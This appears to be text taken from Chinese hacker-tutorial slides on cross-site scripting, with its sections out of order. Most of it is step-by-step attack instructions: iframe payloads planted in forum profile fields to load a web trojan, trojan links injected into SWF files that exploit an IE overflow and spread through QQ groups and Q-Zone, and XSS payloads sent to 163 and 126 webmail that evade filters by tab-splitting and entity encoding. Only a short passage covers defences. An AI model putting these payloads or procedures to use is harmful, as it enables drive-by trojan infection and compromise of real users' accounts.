黑客入门之跨网站攻击技术

Flash溢出跨站攻击 Flash溢出跨站攻击
3．Q-Zone溢出跨站 Zone溢出跨站 打开QQ空间后，在页面中单击【自定义】按钮，在自定义工具栏中单击【模 块】选项卡，单击【新建模块】按钮，在其中选择新建一个Flash模块，在【添加 Flash模块】对话框中的“Flash动画地址”栏中输入Flash溢出木马的网址，如图 6-19所示。单击【确认】按钮，即可完成模块的添加。在提交自定义模块代码后 ，用户进入该QQ空间时会自动打开显示上传的SWF木马Flash，从而在后台下载运 行木马服务端程序。
典型的跨站攻击实例演示
具体的操作步骤如下： 步骤5：单击【更新】按钮，即可提交修改资料内容。若提交成功，即可弹出提示信 息“你的修改信息已成功提交！”，如图6-5所示。 步骤6：提交成功后返回论坛，回复或新发一篇帖子，帖子的内容可以随意填写。发 表成功后再查看新发的帖子，即可发现在新发的帖子页面中已经嵌入了一个网页 框架，在框架中显示了“新起点工作室”的页面，如图6-6所示。
邮箱跨站攻击
1 邮箱跨站的危害 2 国内主流邮箱跨站漏洞
1．Tab绕过过滤：163邮箱跨站测试 2．编码转换逃脱过滤：126邮箱的跨站测试
Tab绕过过滤：163邮箱跨站测试 Tab绕过过滤：163邮箱跨站测试 绕过过滤
对163邮箱进行跨站的操作步骤如下： 步骤1：登录163免费邮箱，在“收件人”栏中填入要攻击的邮箱地址，主题可以任意 填写，单击下方编辑窗口中的【全部功能】按钮展开全部功能项，从功能栏中单 击【编辑源码】按钮 ，进入HTML代码编写状态，在其中输入测试代码<img src=j ava script:wi ndow.op en('')>/，如图6-28所示。 步骤2：单击【发送】按钮，即可发送邮件滤特殊的字符： 过滤特殊的字符：&、回车和空格
转换代码后即可突破过滤程序，继续进行跨站攻击了。有安全意识的程序又 会继续对此漏洞进行弥补过滤，使用“replace(str,"&","&#x26;") ”代码将 “&”符替换成“&#x26;”，于是后面语句便全部变形失效了。但攻击者又可能采 用另外方式绕过过滤，因为过滤关键字方式漏洞很多。攻击者可能会构造“<img src="javascript:alert(/跨站攻击/)" width=100>”攻击代码，如图6-34所示。
黑客攻防秘技实战解析 （第2版）
跨网站攻击技术
♂典型的跨站攻击实例演示 ♂跨站攻击技术演变 ♂邮箱跨站攻击 ♂搜索引擎的跨站攻击
典型的跨站攻击实例演示
具体的操作步骤如下： 步骤1：打开动网论坛首页，如图6-1所示。先在论坛注册一个用户，单击【登录】按 钮进行登录，登录后的界面如图6-2所示。
典型的跨站攻击实例演示
Flash溢出跨站攻击 Flash溢出跨站攻击
2．在QQ群中挂马 QQ群中挂马 群中挂 在新帖页面中单击【插入Flash】按钮，在弹出对话框中输入SWF木马文件的 网络链接地址，并设置其尺寸大小，单击【插入】按钮插入Flash文件，如图6-18 所示。在发表新帖子后，当有人在QQ群中打开查看这篇帖子时，就会自动播放 Flash并在后台下载运行木马服务端了。当然，也可以直接在QQ群中散布SWF木马 文件的网址，别人单击后一样会中木马，不过这种方式不如发表帖子隐蔽的效果 好，攻击的持续性也不强。
具体的操作步骤如下： 步骤3：选择【用户控制面板】→【联系资料修改】菜单项，即可打开个人资料修改 页面，如图6-3所示。 步骤4：在“论坛密码”栏中输入论坛密码，在“主页地址”栏中输入代码 “</Script><IfRA ME height=0 width=0 sRc=”http//网页木马地址 ”></IFrAME>”。另外，还需要在“MSN号码”栏中输入代码：<Script Language=JavaScript>var actioninfo3='单帖屏蔽'，如图6-4所示。
编码转换逃脱过滤：126邮箱的跨站测试 编码转换逃脱过滤：126邮箱的跨站测试
对126邮箱进行跨站的操作步骤如下： 步骤1：登录126免费邮箱，在“收件人”栏中填入要攻击的邮箱地址，主题可任意填 写，单击下方编辑窗口中的【全部功能】按钮展开全部功能项，从功能栏中单击 【编辑源码】按钮 ，即可进入HTML代码编写状态，在其中输入测试代码，如图630所示。 步骤2：在编写完成后，单击【发送】按钮发送邮件，待发送成功后，当接收者在收 到该邮件并进行查看时束,谢谢观赏
跨站脚本攻击的防御
（1）过滤“<”和“>”标记 （2）HTML标记属性过滤 （3）过滤特殊的字符：&、回车和空格 （4）HTML属性跨站的彻底防范
过滤特殊的字符： 过滤特殊的字符：&、回车和空格
其实上述过滤还是不完全的，因为HTML属性的值，可支持“&#ASCii”的形式进行表 示，如前面的跨站代码可以换成如下代码，如图6-33所示。 <img src="javascrip&#116&#58alert(/跨站攻击/)" width=100>
跨站攻击技术的演变
1 2 3 4 不安全的客户端过滤 编辑转换也可以跨站 Flash跳转的跨站攻击 Flash溢h溢出跨站攻击
1．制作Flash溢出木马 制作Flash溢出木马 Flash 步骤1：打开Icode To SWF工具，单击“SWF文件”后面的【选择】按钮，选择本机上 某个正常的Flash文件；在“插入代码”栏中填写刚才的网页木马的链接地址。 步骤2：单击【给我插】按钮，即可将网页木马链接插入到正常的Flash文件中了，如 图6-17所示。SWF插马工具生成的Flash文件是利用了一个IE漏洞，对方打开Flash 文件后，就会造成IE溢出，自动访问木马网页在后台下载运行网页中的木马程序 。
专家课堂（常见问题与解答） 专家课堂（常见问题与解答）
点拨1 点拨1：为什么在使用“getURL("http://www.***.com ");”语句时，没有输入后面 的分号“；”就提示语法错误？ 解答： 解答：Actions acript 的每行语句都以分号“；”结束，它不同于BASIC语言， Actions cript 语句同C++、Java、Pascal一样允许分多行书写，即允许将一条很 的长语句分割成两个或更多代码行，只要在结尾有个分号就行了。 点拨2 点拨2：为什么有些代码中将一些关键字符使用一个空格分隔开了（如javascript） ？ 解答： 解答：在某些代码中使用空格将部分关键字符分隔开，这些空格是使用Tab键产生的 ，是为了逃脱过滤机制，从而顺利进行攻击。